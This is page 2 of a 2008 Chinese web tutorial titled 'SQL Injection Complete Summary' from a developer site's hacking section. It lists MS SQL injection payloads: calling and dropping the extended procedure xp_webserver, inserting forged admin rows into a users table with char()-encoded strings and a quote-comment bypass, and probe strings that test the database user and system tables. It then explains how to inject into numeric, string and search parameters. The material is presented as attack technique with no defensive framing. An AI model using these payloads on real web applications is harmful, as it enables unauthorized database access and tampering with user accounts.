WEB开发网
开发学院网络安全黑客技术 SQL注入总结大全 阅读

SQL注入总结大全

 2008-10-27 16:51:32 来源:WEB开发网   
核心提示: 扩展存储就可以通过一般的方法调用:exec xp_webserver一旦这个扩展存储执行过,可以这样删除它:sp_dropextendedproc 'xp_webserver' insert into users values( 666, char(0x63)+char(0

扩展存储就可以通过一般的方法调用:

exec xp_webserver

一旦这个扩展存储执行过,可以这样删除它:

sp_dropextendedproc 'xp_webserver'

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-

insert into users values( 667,123,123,0xffff)-

insert into users values ( 123, 'admin''--', 'password', 0xffff)-

;and user>0

;;and (select count(*) from sysobjects)>0

;;and (select count(*) from mysysobjects)>0 //为access数据库

-----------------------------------------------------------通常注射的一些介绍:

A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:

select * from 表名 where 字段=49

注入的参数为ID=49 And [查询条件],即是生成语句:

select * from 表名 where 字段=49 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:

select * from 表名 where 字段='连续剧'

注入的参数为Class=连续剧' and [查询条件] and ''=' ,即是生成语句:

select * from 表名 where 字段='连续剧' and [查询条件] and ''=''

(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:

select * from 表名 where 字段like '%关键字%'

注入的参数为keyword=' and [查询条件] and '%25'=', 即是生成语句:

上一页  2 3 4 5 6 7 8 9 10  下一页

Tags:SQL 注入 总结

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接